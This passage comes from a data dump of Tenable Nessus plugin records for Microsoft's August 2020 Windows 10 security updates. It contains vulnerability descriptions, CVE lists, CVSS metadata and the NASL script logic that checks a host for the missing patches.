value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4571692: Windows 10 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571692.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571692/windows-10-update-kb4571692\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?481aa152\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571692.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571692'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571692])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T14:22:55", "description": "The remote Windows host is missing security update 4565349.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4565349: Windows 10 Version 1809 and Windows Server 2019 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1524", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1548", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1569", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1578", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4565349.NASL", "href": "https://www.tenable.com/plugins/nessus/139484", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139484);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1524\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1548\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n 